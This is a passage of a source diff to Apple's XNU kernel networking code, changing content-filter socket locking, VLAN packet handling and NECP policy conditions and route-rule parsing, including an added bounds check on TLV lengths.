+                       if (cfil_socket_safe_lock(inp, pcbinfo)) {
                                so = inp->inp_socket;
                        }
-                       break;
+                       /* pcbinfo is already unlocked, we are done. */
+                       goto done;
                }
        }
        lck_rw_done(pcbinfo->ipi_lock);
@@ -1695,10 +1690,11 @@ find_udp:
                    inp->inp_socket != NULL &&
                    inp->inp_socket->so_cfil_db != NULL &&
                    (inp->inp_socket->so_gencnt & 0x0ffffffff) == gencnt) {
-                       if (cfil_socket_safe_lock(inp)) {
+                       if (cfil_socket_safe_lock(inp, pcbinfo)) {
                                so = inp->inp_socket;
                        }
-                       break;
+                       /* pcbinfo is already unlocked, we are done. */
+                       goto done;
                }
        }
        lck_rw_done(pcbinfo->ipi_lock);
@@ -1713,7 +1709,7 @@ find_udp:
                    inp->inp_socket != NULL &&
                    inp->inp_socket->so_cfil_db != NULL &&
                    (inp->inp_socket->so_gencnt & 0x0ffffffff) == gencnt) {
-                       if (cfil_socket_safe_lock_rip(inp, pcbinfo)) {
+                       if (cfil_socket_safe_lock(inp, pcbinfo)) {
                                so = inp->inp_socket;
                        }
                        /* pcbinfo is already unlocked, we are done. */
@@ -1746,10 +1742,11 @@ cfil_socket_from_client_uuid(uuid_t necp_client_uuid, bool *cfil_attached)
                    inp->inp_socket != NULL &&
                    uuid_compare(inp->necp_client_uuid, necp_client_uuid) == 0) {
                        *cfil_attached = (inp->inp_socket->so_cfil != NULL);
-                       if (cfil_socket_safe_lock(inp)) {
+                       if (cfil_socket_safe_lock(inp, pcbinfo)) {
                                so = inp->inp_socket;
                        }
-                       break;
+                       /* pcbinfo is already unlocked, we are done. */
+                       goto done;
                }
        }
        lck_rw_done(pcbinfo->ipi_lock);
@@ -1764,10 +1761,11 @@ cfil_socket_from_client_uuid(uuid_t necp_client_uuid, bool *cfil_attached)
                    inp->inp_socket != NULL &&
                    uuid_compare(inp->necp_client_uuid, necp_client_uuid) == 0) {
                        *cfil_attached = (inp->inp_socket->so_cfil_db != NULL);
-                       if (cfil_socket_safe_lock(inp)) {
+                       if (cfil_socket_safe_lock(inp, pcbinfo)) {
                                so = inp->inp_socket;
                        }
-                       break;
+                       /* pcbinfo is already unlocked, we are done. */
+                       goto done;
                }
        }
        lck_rw_done(pcbinfo->ipi_lock);
@@ -4265,6 +4263,7 @@ cfil_service_pending_queue(struct socket *so, struct cfil_info *cfil_info, uint3
        struct cfil_entry *entry;
        struct cfe_buf *entrybuf;
        struct cfil_queue *pending_q;
+       struct cfil_entry *iter_entry = NULL;
 
        CFIL_LOG(LOG_INFO, "so %llx kcunit %u outgoing %d",
            (uint64_t)VM_KERNEL_ADDRPERM(so), kcunit, outgoing);
@@ -4282,13 +4281,25 @@ cfil_service_pending_queue(struct socket *so, struct cfil_info *cfil_info, uint3
 
        passlen = entrybuf->cfe_pass_offset - pending_q->q_start;
 
+       if (cfil_queue_empty(pending_q)) {
+               for (iter_entry = SLIST_NEXT(entry, cfe_order_link);
+                   iter_entry != NULL;
+                   iter_entry = SLIST_NEXT(iter_entry, cfe_order_link)) {
+                       error = cfil_data_service_ctl_q(so, cfil_info, CFI_ENTRY_KCUNIT(cfil_info, iter_entry), outgoing);
+                       /* 0 means passed so we can continue */
+                       if (error != 0) {
+                               break;
+                       }
+               }
+               goto done;
+       }
+
        /*
         * Locate the chunks of data that we can pass to the next filter
         * A data chunk must be on mbuf boundaries
         */
        curlen = 0;
        while ((data = cfil_queue_first(pending_q)) != NULL) {
-               struct cfil_entry *iter_entry;
                datalen = cfil_data_length(data, NULL, NULL);
 
 #if DATA_DEBUG
@@ -4334,6 +4345,7 @@ cfil_service_pending_queue(struct socket *so, struct cfil_info *cfil_info, uint3
                }
        }
 
+done:
        CFIL_INFO_VERIFY(cfil_info);
 
        return error;
@@ -7194,6 +7206,13 @@ cfil_info_udp_expire(void *v, wait_result_t w)
                cfil_info_log(LOG_ERR, cfil_info, "CFIL: LIFECYCLE: GC CLEAN UP");
 #endif
 
+               for (int kcunit = 1; kcunit <= MAX_CONTENT_FILTER; kcunit++) {
+                       /* Let the filters know of the closing */
+                       if (cfil_dispatch_closed_event(so, cfil_info, kcunit) != 0) {
+                               goto unlock;
+                       }
+               }
+
                cfil_db_delete_entry(db, hash_entry);
                CFIL_INFO_FREE(cfil_info);
                OSIncrementAtomic(&cfil_stats.cfs_sock_detached);
index b58785c17c314cf8c85bb3b5bfeac44d82887ea6..da376cb11b1b162908df737733c67cee6174fc9f 100644 (file)
@@ -4838,7 +4838,19 @@ skip_clat:
                        }
                        goto next;
                }
-               if ((m->m_flags & M_PROMISC) != 0) {
+               /*
+                * A VLAN interface receives VLAN-tagged packets by attaching
+                * its PF_VLAN protocol to a parent interface. When a VLAN
+                * interface is a member of a bridge, the parent interface
+                * receives VLAN-tagged M_PROMISC packets. A VLAN-tagged
+                * M_PROMISC packet must be processed by the VLAN protocol
+                * so that it can be sent up the stack via
+                * dlil_input_packet_list(). That allows the bridge interface's
+                * input filter, attached to the VLAN interface, to process
+                * the packet.
+                */
+               if (protocol_family != PF_VLAN &&
+                   (m->m_flags & M_PROMISC) != 0) {
                        m_freem(m);
                        goto next;
                }
@@ -5319,8 +5331,7 @@ preout_again:
                if ((raw != 0) && (ifp->if_family == IFNET_FAMILY_ETHERNET)) {
                        uint8_t vlan_encap_len = 0;
 
-                       if ((old_proto_family == PF_VLAN) &&
-                           ((m->m_pkthdr.csum_flags & CSUM_VLAN_TAG_VALID) == 0)) {
+                       if ((m->m_pkthdr.csum_flags & CSUM_VLAN_ENCAP_PRESENT) != 0) {
                                vlan_encap_len = ETHER_VLAN_ENCAP_LEN;
                        }
                        m->m_pkthdr.pkt_hdr = mtod(m, char *) + ETHER_HDR_LEN + vlan_encap_len;
index 7cba0957a5833638a5de67ab29cca7b5411864e0..5001ef7d031047f8fe3bfcc72778d5f4a81223a5 100644 (file)
@@ -1137,6 +1137,7 @@ vlan_output(struct ifnet * ifp, struct mbuf * m)
                        m->m_pkthdr.csum_tx_start += ETHER_VLAN_ENCAP_LEN;
                        m->m_pkthdr.csum_tx_stuff += ETHER_VLAN_ENCAP_LEN;
                }
+               m->m_pkthdr.csum_flags |= CSUM_VLAN_ENCAP_PRESENT;
        }
 
        err = dlil_output(p, PF_VLAN, m, NULL, NULL, 1, &adv);
index c8a364c86124ecb246beb305a75531ec6f499fe3..9914747dfc866962f6a27125f4c62c9c4699d045 100644 (file)
@@ -49,7 +49,6 @@ struct sockopt;
 struct inpcb;
 
 /* Private, internal implementation functions */
-extern void     sflt_init(void);
 extern int      sflt_permission_check(struct inpcb *inp);
 extern void     sflt_initsock(struct socket *so);
 extern void     sflt_termsock(struct socket *so);
index a06dc3914133efd2a11e1c66f3d7e90a8a826852..9948ac719f7987b06989cb0de3e3b9108ab8922d 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2013-2020 Apple Inc. All rights reserved.
+ * Copyright (c) 2013-2021 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -67,6 +67,7 @@
 #include <corecrypto/cchmac.h>
 #include <corecrypto/ccsha2.h>
 #include <os/refcnt.h>
+#include <mach-o/loader.h>
 #include <net/network_agent.h>
 #include <net/necp.h>
 #include <netinet/flow_divert_proto.h>
 u_int32_t necp_drop_all_order = 0;
 u_int32_t necp_drop_all_level = 0;
 
-#define NECP_LOOPBACK_PASS_ALL         1  // Pass all loopback traffic
-#define NECP_LOOPBACK_PASS_WITH_FILTER 2  // Pass all loopback traffic, but activate content filter and/or flow divert if applicable
-
-#if defined(XNU_TARGET_OS_OSX)
-#define NECP_LOOPBACK_PASS_DEFAULT NECP_LOOPBACK_PASS_WITH_FILTER
-#else
-#define NECP_LOOPBACK_PASS_DEFAULT NECP_LOOPBACK_PASS_ALL
-#endif
-
-u_int32_t necp_pass_loopback = NECP_LOOPBACK_PASS_DEFAULT;
+u_int32_t necp_pass_loopback = NECP_LOOPBACK_PASS_ALL;
 u_int32_t necp_pass_keepalives = 1; // 0=Off, 1=On
 u_int32_t necp_pass_interpose = 1; // 0=Off, 1=On
 u_int32_t necp_restrict_multicast = 1; // 0=Off, 1=On
@@ -251,6 +243,7 @@ ZONE_DECLARE(necp_ip_policy_zone, "necp_ip_policy",
 #define NECP_KERNEL_CONDITION_SIGNING_IDENTIFIER                0x10000000
 #define NECP_KERNEL_CONDITION_PACKET_FILTER_TAGS                0x20000000
 #define NECP_KERNEL_CONDITION_IS_LOOPBACK                       0x40000000
+#define NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY       0x80000000
 
 #define NECP_MAX_POLICY_RESULT_SIZE                                     512
 #define NECP_MAX_ROUTE_RULES_ARRAY_SIZE                         1024
@@ -301,6 +294,7 @@ static TAILQ_HEAD(_necp_session_list, necp_session) necp_session_list;
 
 struct necp_socket_info {
        pid_t pid;
+       int32_t pid_version;
        uid_t uid;
        union necp_sockaddr_union local_addr;
        union necp_sockaddr_union remote_addr;
@@ -318,7 +312,9 @@ struct necp_socket_info {
        unsigned is_platform_binary : 1;
        unsigned used_responsible_pid : 1;
        unsigned is_loopback : 1;
-       unsigned __pad_bits : 4;
+       unsigned real_is_platform_binary : 1;
+       unsigned is_delegated : 1;
+       unsigned __pad_bits : 6;
 };
 
 static  lck_grp_attr_t  *necp_kernel_policy_grp_attr    = NULL;
@@ -409,7 +405,7 @@ static bool necp_policy_mark_all_for_deletion(struct necp_session *session);
 static bool necp_policy_delete(struct necp_session *session, struct necp_session_policy *policy);
 static void necp_policy_apply_all(struct necp_session *session);
 
-static necp_kernel_policy_id necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *domain, pid_t cond_pid, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter);
+static necp_kernel_policy_id necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *domain, pid_t cond_pid, int32_t cond_pidversion, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter);
 static bool necp_kernel_socket_policy_delete(necp_kernel_policy_id policy_id);
 static bool necp_kernel_socket_policies_reprocess(void);
 static bool necp_kernel_socket_policies_update_uuid_table(void);
@@ -450,6 +446,7 @@ static struct necp_uuid_id_mapping *necp_uuid_lookup_service_id_locked(uuid_t uu
 static struct necp_uuid_id_mapping *necp_uuid_lookup_uuid_with_service_id_locked(u_int32_t local_id);
 static u_int32_t necp_create_uuid_service_id_mapping(uuid_t uuid);
 static bool necp_remove_uuid_service_id_mapping(uuid_t uuid);
+static bool necp_remove_uuid_service_id_mapping_with_service_id(u_int32_t service_id);
 
 struct necp_string_id_mapping {
        LIST_ENTRY(necp_string_id_mapping) chain;
@@ -479,7 +476,8 @@ static bool necp_update_qos_marking(struct ifnet *ifp, u_int32_t route_rule_id);
 struct necp_route_rule {
        LIST_ENTRY(necp_route_rule) chain;
        u_int32_t       id;
-       u_int32_t       default_action;
+       u_int32_t       netagent_id;
+       u_int8_t        default_action;
        u_int8_t        cellular_action;
        u_int8_t        wifi_action;
        u_int8_t        wired_action;
@@ -493,6 +491,7 @@ static LIST_HEAD(necp_route_rule_list, necp_route_rule) necp_route_rules;
 static u_int32_t necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_array, u_int32_t route_rules_array_size);
 static bool necp_remove_route_rule(struct necp_route_rule_list *list, u_int32_t route_rule_id);
 static bool necp_route_is_allowed(struct rtentry *route, ifnet_t interface, u_int32_t route_rule_id, u_int32_t *interface_type_denied);
+static uint32_t necp_route_get_netagent(struct rtentry *route, u_int32_t route_rule_id);
 static struct necp_route_rule *necp_lookup_route_rule_locked(struct necp_route_rule_list *list, u_int32_t route_rule_id);
 static inline void necp_get_parent_cred_result(proc_t proc, struct necp_socket_info *info);
 
@@ -2097,6 +2096,10 @@ necp_policy_condition_is_valid(u_int8_t *buffer, u_int32_t length, u_int8_t poli
                validated = TRUE;
                break;
        }
+       case NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY: {
+               validated = TRUE;
+               break;
+       }
        default: {
                validated = FALSE;
                break;
@@ -2139,6 +2142,11 @@ necp_policy_route_rule_is_valid(u_int8_t *buffer, u_int32_t length)
                validated = TRUE;
                break;
        }
+       case NECP_ROUTE_RULE_USE_NETAGENT: {
+               u_int32_t rule_length = necp_policy_condition_get_value_length_from_buffer(buffer, length);
+               validated = (rule_length >= sizeof(uuid_t));
+               break;
+       }
        default: {
                validated = FALSE;
                break;
@@ -2686,7 +2694,7 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length)
                                num_conditions++;
                        }
                        if (condition_mask & NECP_KERNEL_CONDITION_PID) {
-                               condition_tlv_length += sizeof(pid_t);
+                               condition_tlv_length += (sizeof(pid_t) + sizeof(int32_t));
                                num_conditions++;
                        }
                        if (condition_mask & NECP_KERNEL_CONDITION_UID) {
@@ -2757,6 +2765,9 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length)
                        if (condition_mask & NECP_KERNEL_CONDITION_IS_LOOPBACK) {
                                num_conditions++;
                        }
+                       if (condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) {
+                               num_conditions++;
+                       }
                }
 
                condition_tlv_length += num_conditions * (sizeof(u_int8_t) + sizeof(u_int32_t)); // These are for the condition TLVs. The space for "value" is already accounted for above.
@@ -2838,7 +2849,10 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length)
                                }
                        }
                        if (condition_mask & NECP_KERNEL_CONDITION_PID) {
-                               cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_PID, sizeof(policy->cond_pid), &policy->cond_pid,
+                               uint8_t pid_buffer[sizeof(policy->cond_pid) + sizeof(policy->cond_pid_version)] = { };
+                               memcpy(pid_buffer, &policy->cond_pid, sizeof(policy->cond_pid));
+                               memcpy(pid_buffer + sizeof(policy->cond_pid), &policy->cond_pid_version, sizeof(policy->cond_pid_version));
+                               cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_PID, sizeof(pid_buffer), &pid_buffer,
                                    cond_buf, condition_tlv_length);
                        }
                        if (condition_mask & NECP_KERNEL_CONDITION_UID) {
@@ -2919,6 +2933,9 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length)
                        if (condition_mask & NECP_KERNEL_CONDITION_IS_LOOPBACK) {
                                cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_FLOW_IS_LOOPBACK, 0, "", cond_buf, condition_tlv_length);
                        }
+                       if (condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) {
+                               cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY, 0, "", cond_buf, condition_tlv_length);
+                       }
                }
 
                cursor = necp_buffer_write_tlv(cursor, NECP_TLV_POLICY_CONDITION, cond_buf_cursor - cond_buf, cond_buf, tlv_buffer, total_allocated_bytes);
@@ -3239,6 +3256,7 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli
        char *cond_custom_entitlement = NULL;
        char *cond_signing_identifier = NULL;
        pid_t cond_pid = 0;
+       int32_t cond_pid_version = 0;
        uid_t cond_uid = 0;
        necp_app_id cond_app_id = 0;
        necp_app_id cond_real_app_id = 0;
@@ -3407,6 +3425,9 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli
                                        master_condition_negated_mask |= NECP_KERNEL_CONDITION_PID;
                                }
                                memcpy(&cond_pid, condition_value, sizeof(cond_pid));
+                               if (condition_length >= (sizeof(pid_t) + sizeof(cond_pid_version))) {
+                                       memcpy(&cond_pid_version, (condition_value + sizeof(pid_t)), sizeof(cond_pid_version));
+                               }
                                socket_only_conditions = TRUE;
                        }
                        break;
@@ -3631,6 +3652,14 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli
                        socket_only_conditions = TRUE;
                        break;
                }
+               case NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY: {
+                       master_condition_mask |= NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY;
+                       if (condition_is_negative) {
+                               master_condition_negated_mask |= NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY;
+                       }
+                       socket_only_conditions = TRUE;
+                       break;
+               }
                default: {
                        break;
                }
@@ -3817,7 +3846,7 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli
        }
 
        if (socket_layer_non_id_conditions) {
-               necp_kernel_policy_id policy_id = necp_kernel_socket_policy_add(policy->order, session->session_order, session->proc_pid, master_condition_mask, master_condition_negated_mask, cond_app_id, cond_real_app_id, cond_custom_entitlement, cond_account_id, cond_domain, cond_pid, cond_uid, cond_bound_interface, cond_traffic_class, cond_protocol, &cond_local_start, &cond_local_end, cond_local_prefix, &cond_remote_start, &cond_remote_end, cond_remote_prefix, &cond_agent_type, &cond_sdk_version, cond_client_flags, cond_signing_identifier, cond_packet_filter_tags, ultimate_result, ultimate_result_parameter);
+               necp_kernel_policy_id policy_id = necp_kernel_socket_policy_add(policy->order, session->session_order, session->proc_pid, master_condition_mask, master_condition_negated_mask, cond_app_id, cond_real_app_id, cond_custom_entitlement, cond_account_id, cond_domain, cond_pid, cond_pid_version, cond_uid, cond_bound_interface, cond_traffic_class, cond_protocol, &cond_local_start, &cond_local_end, cond_local_prefix, &cond_remote_start, &cond_remote_end, cond_remote_prefix, &cond_agent_type, &cond_sdk_version, cond_client_flags, cond_signing_identifier, cond_packet_filter_tags, ultimate_result, ultimate_result_parameter);
 
                if (policy_id == 0) {
                        NECPLOG0(LOG_DEBUG, "Error applying socket kernel policy");
@@ -3986,10 +4015,10 @@ necp_kernel_policy_get_new_id(bool socket_level)
        return newid;
 }
 
-#define NECP_KERNEL_VALID_SOCKET_CONDITIONS (NECP_KERNEL_CONDITION_APP_ID | NECP_KERNEL_CONDITION_REAL_APP_ID | NECP_KERNEL_CONDITION_DOMAIN | NECP_KERNEL_CONDITION_ACCOUNT_ID | NECP_KERNEL_CONDITION_PID | NECP_KERNEL_CONDITION_UID | NECP_KERNEL_CONDITION_ALL_INTERFACES | NECP_KERNEL_CONDITION_BOUND_INTERFACE | NECP_KERNEL_CONDITION_TRAFFIC_CLASS | NECP_KERNEL_CONDITION_PROTOCOL | NECP_KERNEL_CONDITION_LOCAL_START | NECP_KERNEL_CONDITION_LOCAL_END | NECP_KERNEL_CONDITION_LOCAL_PREFIX | NECP_KERNEL_CONDITION_REMOTE_START | NECP_KERNEL_CONDITION_REMOTE_END | NECP_KERNEL_CONDITION_REMOTE_PREFIX | NECP_KERNEL_CONDITION_ENTITLEMENT | NECP_KERNEL_CONDITION_CUSTOM_ENTITLEMENT | NECP_KERNEL_CONDITION_AGENT_TYPE | NECP_KERNEL_CONDITION_HAS_CLIENT | NECP_KERNEL_CONDITION_LOCAL_NETWORKS | NECP_KERNEL_CONDITION_CLIENT_FLAGS | NECP_KERNEL_CONDITION_LOCAL_EMPTY | NECP_KERNEL_CONDITION_REMOTE_EMPTY | NECP_KERNEL_CONDITION_PLATFORM_BINARY | NECP_KERNEL_CONDITION_SDK_VERSION | NECP_KERNEL_CONDITION_SIGNING_IDENTIFIER | NECP_KERNEL_CONDITION_PACKET_FILTER_TAGS | NECP_KERNEL_CONDITION_IS_LOOPBACK)
+#define NECP_KERNEL_VALID_SOCKET_CONDITIONS (NECP_KERNEL_CONDITION_APP_ID | NECP_KERNEL_CONDITION_REAL_APP_ID | NECP_KERNEL_CONDITION_DOMAIN | NECP_KERNEL_CONDITION_ACCOUNT_ID | NECP_KERNEL_CONDITION_PID | NECP_KERNEL_CONDITION_UID | NECP_KERNEL_CONDITION_ALL_INTERFACES | NECP_KERNEL_CONDITION_BOUND_INTERFACE | NECP_KERNEL_CONDITION_TRAFFIC_CLASS | NECP_KERNEL_CONDITION_PROTOCOL | NECP_KERNEL_CONDITION_LOCAL_START | NECP_KERNEL_CONDITION_LOCAL_END | NECP_KERNEL_CONDITION_LOCAL_PREFIX | NECP_KERNEL_CONDITION_REMOTE_START | NECP_KERNEL_CONDITION_REMOTE_END | NECP_KERNEL_CONDITION_REMOTE_PREFIX | NECP_KERNEL_CONDITION_ENTITLEMENT | NECP_KERNEL_CONDITION_CUSTOM_ENTITLEMENT | NECP_KERNEL_CONDITION_AGENT_TYPE | NECP_KERNEL_CONDITION_HAS_CLIENT | NECP_KERNEL_CONDITION_LOCAL_NETWORKS | NECP_KERNEL_CONDITION_CLIENT_FLAGS | NECP_KERNEL_CONDITION_LOCAL_EMPTY | NECP_KERNEL_CONDITION_REMOTE_EMPTY | NECP_KERNEL_CONDITION_PLATFORM_BINARY | NECP_KERNEL_CONDITION_SDK_VERSION | NECP_KERNEL_CONDITION_SIGNING_IDENTIFIER | NECP_KERNEL_CONDITION_PACKET_FILTER_TAGS | NECP_KERNEL_CONDITION_IS_LOOPBACK | NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY)
 
 static necp_kernel_policy_id
-necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *cond_domain, pid_t cond_pid, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter)
+necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *cond_domain, pid_t cond_pid, int32_t cond_pid_version, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter)
 {
        struct necp_kernel_socket_policy *new_kernel_policy = NULL;
        struct necp_kernel_socket_policy *tmp_kernel_policy = NULL;
@@ -4046,6 +4075,7 @@ necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order,
        }
        if (new_kernel_policy->condition_mask & NECP_KERNEL_CONDITION_PID) {
                new_kernel_policy->cond_pid = cond_pid;
+               new_kernel_policy->cond_pid_version = cond_pid_version;
        }
        if (new_kernel_policy->condition_mask & NECP_KERNEL_CONDITION_UID) {
                new_kernel_policy->cond_uid = cond_uid;
@@ -4562,7 +4592,7 @@ necp_kernel_socket_policy_is_unnecessary(struct necp_kernel_socket_policy *polic
                }
 
                if (compared_policy->condition_mask & NECP_KERNEL_CONDITION_PID &&
-                   compared_policy->cond_pid != policy->cond_pid) {
+                   (compared_policy->cond_pid != policy->cond_pid || compared_policy->cond_pid_version != policy->cond_pid_version)) {
                        continue;
                }
 
@@ -4970,7 +5000,7 @@ necp_lookup_route_rule_locked(struct necp_route_rule_list *list, u_int32_t route
 }
 
 static struct necp_route_rule *
-necp_lookup_route_rule_by_contents_locked(struct necp_route_rule_list *list, u_int32_t default_action, u_int8_t cellular_action, u_int8_t wifi_action, u_int8_t wired_action, u_int8_t expensive_action, u_int8_t constrained_action, u_int32_t *if_indices, u_int8_t *if_actions)
+necp_lookup_route_rule_by_contents_locked(struct necp_route_rule_list *list, u_int8_t default_action, u_int8_t cellular_action, u_int8_t wifi_action, u_int8_t wired_action, u_int8_t expensive_action, u_int8_t constrained_action, u_int32_t *if_indices, u_int8_t *if_actions, uuid_t netagent_uuid)
 {
        struct necp_route_rule *searchentry = NULL;
        struct necp_route_rule *foundentry = NULL;
@@ -5011,10 +5041,32 @@ necp_lookup_route_rule_by_contents_locked(struct necp_route_rule_list *list, u_i
                                        break;
                                }
                        }
-                       if (!match_failed && count_a == count_b) {
-                               foundentry = searchentry;
-                               break;
+
+                       if (match_failed || count_a != count_b) {
+                               continue;
+                       }
+
+                       bool has_agent_a = uuid_is_null(netagent_uuid);
+                       bool has_agent_b = (searchentry->netagent_id != 0);
+                       if (has_agent_a != has_agent_b) {
+                               continue;
                        }
+
+                       if (has_agent_a) {
+                               struct necp_uuid_id_mapping *mapping = necp_uuid_lookup_uuid_with_service_id_locked(searchentry->netagent_id);
+                               if (mapping == NULL) {
+                                       // Bad mapping, doesn't match
+                                       continue;
+                               }
+                               if (uuid_compare(mapping->uuid, netagent_uuid) != 0) {
+                                       // UUIDs don't match
+                                       continue;
+                               }
+                       }
+
+                       // Rules match!
+                       foundentry = searchentry;
+                       break;
                }
        }
 
@@ -5027,7 +5079,7 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
        size_t offset = 0;
        u_int32_t route_rule_id = 0;
        struct necp_route_rule *existing_rule = NULL;
-       u_int32_t default_action = NECP_ROUTE_RULE_ALLOW_INTERFACE;
+       u_int8_t default_action = NECP_ROUTE_RULE_ALLOW_INTERFACE;
        u_int8_t cellular_action = NECP_ROUTE_RULE_NONE;
        u_int8_t wifi_action = NECP_ROUTE_RULE_NONE;
        u_int8_t wired_action = NECP_ROUTE_RULE_NONE;
@@ -5039,6 +5091,8 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
        u_int8_t if_actions[MAX_ROUTE_RULE_INTERFACES];
        memset(&if_actions, 0, sizeof(if_actions));
 
+       uuid_t netagent_uuid = {};
+
        LCK_RW_ASSERT(&necp_kernel_policy_lock, LCK_RW_ASSERT_EXCLUSIVE);
 
        if (route_rules_array == NULL || route_rules_array_size == 0) {
@@ -5046,12 +5100,20 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
        }
 
        // Process rules
-       while (offset < route_rules_array_size) {
+       while ((offset + sizeof(u_int8_t) + sizeof(u_int32_t)) < route_rules_array_size) {
                ifnet_t rule_interface = NULL;
                char interface_name[IFXNAMSIZ];
                u_int32_t length = 0;
                u_int8_t *value = necp_buffer_get_tlv_value(route_rules_array, offset, &length);
 
+               if (offset + sizeof(u_int8_t) + sizeof(u_int32_t) + length > route_rules_array_size) {
+                       // Invalid TLV goes beyond end of the rules array
+                       break;
+               }
+
+               // Increment offset for the next time through the loop
+               offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length;
+
                u_int8_t rule_type = necp_policy_condition_get_type_from_buffer(value, length);
                u_int8_t rule_flags = necp_policy_condition_get_flags_from_buffer(value, length);
                u_int32_t rule_length = necp_policy_condition_get_value_length_from_buffer(value, length);
@@ -5062,6 +5124,27 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
                        continue;
                }
 
+               if (rule_type == NECP_ROUTE_RULE_USE_NETAGENT) {
+                       if (rule_length < sizeof(uuid_t)) {
+                               // Too short, skip
+                               continue;
+                       }
+
+                       if (!uuid_is_null(netagent_uuid)) {
+                               if (uuid_compare(netagent_uuid, rule_value) != 0) {
+                                       // UUIDs don't match, skip
+                                       continue;
+                               }
+                       } else {
+                               // Copy out agent UUID
+                               memcpy(netagent_uuid, rule_value, sizeof(netagent_uuid));
+                       }
+
+                       // Adjust remaining length
+                       rule_value += sizeof(netagent_uuid);
+                       rule_length -= sizeof(netagent_uuid);
+               }
+
                if (rule_length == 0) {
                        if (rule_flags & NECP_ROUTE_RULE_FLAG_CELLULAR) {
                                cellular_action = rule_type;
